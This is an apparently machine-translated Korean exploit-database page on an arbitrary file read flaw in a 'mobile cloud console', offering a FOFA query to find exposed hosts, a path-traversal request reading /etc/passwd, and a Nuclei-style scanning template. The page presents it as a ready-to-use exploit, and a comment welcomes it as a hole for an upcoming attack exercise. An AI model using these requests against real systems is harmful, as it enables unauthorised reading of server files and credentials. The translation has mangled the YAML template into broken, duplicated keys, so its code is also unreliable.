모바일 클라우드 콘솔의 임의 파일 읽기 취약점

expdb 애플리케이션 보안 3464

모바일 클라우드 콘솔은 모바일 클라우드 제품 및 서비스를 통합적으로 조회하고 관리하는 데 사용되는 시스템으로, 모바일 클라우드 콘솔에 임의 파일 읽기 취약점이 있으며, 권한이 없는 공격자가 이를 악용하여 웹사이트 구성 파일과 같은 민감한 정보를 읽을 수 있습니다.

fofa

 

body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"

poc

 

GET /api/query/helpcenter/api/v2/preview?fileName=... /... /... /... /... /... /... /... /etc/passwd HTTP/1.1
호스트: ip

image-20240602201314531

Yaml

 

ID: cmecloud-console-readfile

정보: 이름: cmecloud-console-readfile
  이름: cmecloud-console-readfile
  작성자: onewin
  심각도: 높음
  설명: 임의의 파일 읽기를 위한 모바일 클라우드 콘솔이 존재합니다.

http.
- raw.
  - |+
    시간 초과: 30초
    GET /api/query/helpcenter/api/v2/preview?fileName=... /... /... /... /... /... /... /... /etc/passwd HTTP/1.1
    호스트: {{호스트이름}}

  일치자 조건: 및
  일치자: {{호스트명}}
      - type: status
        상태: {{호스트이름}} matchers-condition: 및 일치자: 유형: 상태
          - 200
      - 유형: 단어
        단어
          - "root"
        부분: 본문

댓글

1 댓글 댓글 추가
  • 최고 보안 책임자
    최고 보안 책임자
    최고 보안 책임자(cncso.com)
    답글

    현재 답변이 최고로 채택됨

    HVV 이제 곧 시작되는데, 여기 허점이 있습니다. :)

    1TP1개월 전 댓글 없음